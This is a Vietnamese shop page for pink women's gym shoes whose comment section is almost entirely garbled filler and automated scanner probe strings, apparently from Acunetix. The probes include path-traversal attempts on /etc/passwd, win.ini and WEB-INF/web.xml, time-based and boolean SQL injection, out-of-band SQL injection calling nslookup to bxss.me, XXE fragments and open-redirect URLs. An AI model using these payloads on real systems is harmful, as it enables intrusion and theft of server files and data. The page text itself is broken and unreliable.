• Hiện tại : 0 có sản phẩm trong giỏ hàng

Giày tập gym nữ hồng

Mã sản phẩm:

✔ Thiết kế trẻ trung, năng động

✔ Chất liệu cao cấp, chi tiết sắc nét

✔ Thoải mái vận động linh hoạt

 

Giá: 445,000 vnđ 490,000 vnđ

Chi tiết sản phẩm

Giày tập gym nữ hồng đen là một sự lựa chọn tuyệt với của những bạn gái trẻ trung năng động. Sẽ rất tuyệt nếu  kết hợp với một Găng tay tập gym cùng màu, bạn sẽ rất thời trang và nổi bật.

Phần dây buộc được thiết kế thông minh, có thể linh hoạt điều chỉnh độ rộng, chật, chắc chắn bạn sẽ rất thoải mái trong phòng tập

Được thiết kế theo tiêu chuẩn hiện đại, dễ dàng vệ sinh và bảo quản

e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
WEB-INF\web.xml 8 Thángs trước
WEB-INF/web.xml 8 Thángs trước
8 Thángs trước
unexisting/../../../../../../../../../../windows/w 8 Thángs trước
../.../.././../.../.././../.../.././../.../.././.. 8 Thángs trước
8 Thángs trước
8 Thángs trước
../..//../..//../..//../..//../..//../..//../..//. 8 Thángs trước
8 Thángs trước
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 8 Thángs trước
8 Thángs trước
..\..\..\..\..\..\..\..\windows\win.ini 8 Thángs trước
................windowswin.ini 8 Thángs trước
8 Thángs trước
../../../../../../../../../../windows/win.ini.jpg 8 Thángs trước
C:\WINDOWS\system32\drivers\etc\hosts 8 Thángs trước
8 Thángs trước
../../../../../../../../../../windows/win.ini 8 Thángs trước
WEB-INF\web.xml 8 Thángs trước
/WEB-INF/web.xml 8 Thángs trước
8 Thángs trước
WEB-INF/web.xml 8 Thángs trước
8 Thángs trước
/\../\../\../\../\../\../\../etc/passwd 8 Thángs trước
file:///etc/passwd 8 Thángs trước
invalid../../../../../../../../../../etc/passwd/./ 8 Thángs trước
.. 8 Thángs trước
../.../.././../.../.././../.../.././../.../.././.. 8 Thángs trước
../..//../..//../..//../..//../..//../..//../..//. 8 Thángs trước
/.././.././.././.././.././.././.././../etc/./passw 8 Thángs trước
%2fetc%2fpasswd 8 Thángs trước
8 Thángs trước
/etc/passwd 8 Thángs trước
8 Thángs trước
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 8 Thángs trước
/../..//../..//../..//../..//../..//etc/passwd.jp 8 Thángs trước
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F 8 Thángs trước
../../../../../../../../../../etc/passwd.jpg 8 Thángs trước
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F 8 Thángs trước
../../../../../../../../../../../../../../../proc/ 8 Thángs trước
../../../../../../../../../../etc/passwd 8 Thángs trước
WEB-INF\web.xml 8 Thángs trước
WEB-INF/web.xml 8 Thángs trước
unexisting/../../../../../../../../../../windows/w 8 Thángs trước
../.../.././../.../.././../.../.././../.../.././.. 8 Thángs trước
../..//../..//../..//../..//../..//../..//../..//. 8 Thángs trước
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 8 Thángs trước
..\..\..\..\..\..\..\..\windows\win.ini 8 Thángs trước
................windowswin.ini 8 Thángs trước
8 Thángs trước
../../../../../../../../../../windows/win.ini.jpg 8 Thángs trước
C:\WINDOWS\system32\drivers\etc\hosts 8 Thángs trước
../../../../../../../../../../windows/win.ini 8 Thángs trước
WEB-INF\web.xml 8 Thángs trước
/WEB-INF/web.xml 8 Thángs trước
WEB-INF/web.xml 8 Thángs trước
/\../\../\../\../\../\../\../etc/passwd 8 Thángs trước
file:///etc/passwd 8 Thángs trước
invalid../../../../../../../../../../etc/passwd/./ 8 Thángs trước
.. 8 Thángs trước
../.../.././../.../.././../.../.././../.../.././.. 8 Thángs trước
../..//../..//../..//../..//../..//../..//../..//. 8 Thángs trước
/.././.././.././.././.././.././.././../etc/./passw 8 Thángs trước
%2fetc%2fpasswd 8 Thángs trước
/etc/passwd 8 Thángs trước
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 8 Thángs trước
/../..//../..//../..//../..//../..//etc/passwd.jp 8 Thángs trước
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F 8 Thángs trước
../../../../../../../../../../etc/passwd.jpg 8 Thángs trước
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F 8 Thángs trước
../../../../../../../../../../../../../../../proc/ 8 Thángs trước
../../../../../../../../../../etc/passwd 8 Thángs trước
e';copy (select '') to program 'nslookup dns.sqli. 8 Thángs trước
'||UTL_INADDR.get_host_address('dns.'||'sqli.01655 8 Thángs trước
KeqTyotz'));select pg_sleep(24); -- 8 Thángs trước
xJ9MrnNE');select pg_sleep(24); -- 8 Thángs trước
KfJb6fJe';select pg_sleep(24); -- 8 Thángs trước
iuB65FBM'; waitfor delay '0:0:16' -- 8 Thángs trước
1 waitfor delay '0:0:16' -- 8 Thángs trước
(select(0)from(select(sleep(8)))v)/*'+(select(0)fr 8 Thángs trước
if(now()=sysdate(),sleep(8),0)/*'XOR(if(now()=sysd 8 Thángs trước
-1 OR 3+906-906-1=0+0+0+1 8 Thángs trước
-1 OR 2+906-906-1=0+0+0+1 8 Thángs trước
-1 OR 3*2>(0+5+132-132) -- 8 Thángs trước
-1 OR 3*2<(0+5+132-132) -- 8 Thángs trước
-1 OR 3+132-132-1=0+0+0+1 -- 8 Thángs trước
-1 OR 2+132-132-1=0+0+0+1 -- 8 Thángs trước
e%' AND 2*3*8=6*9 AND 'FjgD'!='FjgD% 8 Thángs trước
e%' AND 2*3*8=6*8 AND 'FjgD'!='FjgD% 8 Thángs trước
e" AND 2*3*8=6*9 AND "g40j"="g40j 8 Thángs trước
e" AND 2*3*8=6*8 AND "g40j"="g40j 8 Thángs trước
e' AND 2*3*8=6*9 AND '7vN7'='7vN7 8 Thángs trước
e' AND 2*3*8=6*8 AND '7vN7'='7vN7 8 Thángs trước
LMiX7nwk 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e';copy (select '') to program 'nslookup dns.sqli. 8 Thángs trước
'||UTL_INADDR.get_host_address('dns.'||'sqli.01655 8 Thángs trước
QVKNRSAJ'));select pg_sleep(21); -- 8 Thángs trước
MJWs87vI');select pg_sleep(21); -- 8 Thángs trước
56aZdpYF';select pg_sleep(21); -- 8 Thángs trước
SIcoKp8c'; waitfor delay '0:0:14' -- 8 Thángs trước
1 waitfor delay '0:0:14' -- 8 Thángs trước
(select(0)from(select(sleep(14)))v)/*'+(select(0)f 8 Thángs trước
if(now()=sysdate(),sleep(7),0)/*'XOR(if(now()=sysd 8 Thángs trước
-1 OR 3+296-296-1=0+0+0+1 8 Thángs trước
-1 OR 2+296-296-1=0+0+0+1 8 Thángs trước
-1 OR 3*2>(0+5+734-734) -- 8 Thángs trước
-1 OR 3*2<(0+5+734-734) -- 8 Thángs trước
-1 OR 3+734-734-1=0+0+0+1 -- 8 Thángs trước
-1 OR 2+734-734-1=0+0+0+1 -- 8 Thángs trước
e%' AND 2*3*8=6*8 AND 'KOWe'!='KOWe% 8 Thángs trước
e" AND 2*3*8=6*9 AND "wICM"="wICM 8 Thángs trước
e" AND 2*3*8=6*8 AND "wICM"="wICM 8 Thángs trước
e' AND 2*3*8=6*9 AND 'DGTz'='DGTz 8 Thángs trước
e' AND 2*3*8=6*8 AND 'DGTz'='DGTz 8 Thángs trước
WAcclriH 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
JyI= 8 Thángs trước
@@kREXl 8 Thángs trước
1 8 Thángs trước
\ 8 Thángs trước
1'" 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
JyI= 8 Thángs trước
8 Thángs trước
@@t4c4t 8 Thángs trước
8 Thángs trước
8 Thángs trước
1 8 Thángs trước
\ 8 Thángs trước
1'" 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
/\www.vulnweb.com 8 Thángs trước
8 Thángs trước
//www.vulnweb.com 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
1';copy (select '') to program 'nslookup dns.sqli.\016551.2-220.2.a0774.\1.bxss.me
8 Thángs trước
http://www.vulnweb.com 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
1;copy (select '') to program 'nslookup dns.sqli.\016551.2-219.2.a0774.\1.bxss.me'
915859 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
'||UTL_INADDR.get_host_address('dns.'||'sqli.016551.2-218.2.a0774.1.bxss'||'.me')||'
/www.vulnweb.com 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
1||UTL_INADDR.get_host_address('dns.'||'sqli.016551.2-217.2.a0774.1.bxss'||'.me')
/\www.vulnweb.com 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
//www.vulnweb.com 8 Thángs trước
e 8 Thángs trước
o5ovw3JM'));select pg_sleep(16); --
e 8 Thángs trước
http://www.vulnweb.com 8 Thángs trước
e 8 Thángs trước
UBWYMbcL');select pg_sleep(8); --
e 8 Thángs trước
929533 8 Thángs trước
e 8 Thángs trước
bCsjlhH8';select pg_sleep(8); --
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
/www.vulnweb.com 8 Thángs trước
e 8 Thángs trước
-1));select pg_sleep(8); --
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
-1);select pg_sleep(8); --
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
WEB-INF\web.xml
e 8 Thángs trước
e 8 Thángs trước
-1;select pg_sleep(8); --
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
WEB-INF/web.xml
e 8 Thángs trước
e 8 Thángs trước
xjFLtf9P'; waitfor delay '0:0:8' --
8 Thángs trước
e 8 Thángs trước
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
8 Thángs trước
e 8 Thángs trước
1 waitfor delay '0:0:24' --
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
8 Thángs trước
e 8 Thángs trước
-1); waitfor delay '0:0:24' --
e 8 Thángs trước
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
8 Thángs trước
'" 8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
-1; waitfor delay '0:0:24' --
e 8 Thángs trước
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
(select(0)from(select(sleep(24)))v)/*'+(select(0)from(select(sleep(24)))v)+'"+(select(0)from(select(sleep(24)))v)+"*/
e 8 Thángs trước
..\..\..\..\..\..\..\..\windows\win.ini
e 8 Thángs trước
e 8 Thángs trước
test
8 Thángs trước
'" 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
if(now()=sysdate(),sleep(24),0)/*'XOR(if(now()=sysdate(),sleep(24),0))OR'"XOR(if(now()=sysdate(),sleep(24),0))OR"*/
e 8 Thángs trước
................windowswin.ini
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
%xxe; ]>
8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
-1 OR 3*2>(0+5+813-813)
e 8 Thángs trước
../../../../../../../../../../windows/win.ini.jpg
e 8 Thángs trước
-1 OR 3*2<(0+5+813-813)
8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
C:\WINDOWS\system32\drivers\etc\hosts
e 8 Thángs trước
-1 OR 3+813-813-1=0+0+0+1
8 Thángs trước
e 8 Thángs trước
acunetix
e 8 Thángs trước
../../../../../../../../../../windows/win.ini
e 8 Thángs trước
-1 OR 2+813-813-1=0+0+0+1
8 Thángs trước
e 8 Thángs trước
WEB-INF\web.xml
e 8 Thángs trước
]> &acunetixent;
e 8 Thángs trước
-1 OR 3*2>(0+5+960-960) --
e 8 Thángs trước
/WEB-INF/web.xml
e 8 Thángs trước
-1 OR 3*2<(0+5+960-960) --
8 Thángs trước
test
e 8 Thángs trước
WEB-INF/web.xml
e 8 Thángs trước
-1 OR 3+960-960-1=0+0+0+1 --
e 8 Thángs trước
/\../\../\../\../\../\../\../etc/passwd
8 Thángs trước
%xxe; ]>
e 8 Thángs trước
-1 OR 2+960-960-1=0+0+0+1 --
e 8 Thángs trước
e 8 Thángs trước
file:///etc/passwd
8 Thángs trước
e 8 Thángs trước
1*1*1*1
e 8 Thángs trước
e 8 Thángs trước
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
e 8 Thángs trước
1*1*1*1
8 Thángs trước
e 8 Thángs trước
..
8 Thángs trước
acunetix
e 8 Thángs trước
1*1*1*1
8 Thángs trước
e 8 Thángs trước
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
8 Thángs trước
]> &acunetixent;
e 8 Thángs trước
1*1*1*1
e 8 Thángs trước
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
e 8 Thángs trước
e 8 Thángs trước
TlLZ6oAy
8 Thángs trước
e 8 Thángs trước
/.././.././.././.././.././.././.././../etc/./passwd%00
e 8 Thángs trước
1
e 8 Thángs trước
%2fetc%2fpasswd
e 8 Thángs trước
1
e 8 Thángs trước
/etc/passwd
8 Thángs trước
1';copy (select '') to program 'nslookup dns.sqli.\016551.2-212.2.a0774.\1.bxss.me
e 8 Thángs trước
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
8 Thángs trước
1;copy (select '') to program 'nslookup dns.sqli.\016551.2-211.2.a0774.\1.bxss.me'
e 8 Thángs trước
/../..//../..//../..//../..//../..//etc/passwd.jpg
post-comment/. 8 Thángs trước
8 Thángs trước
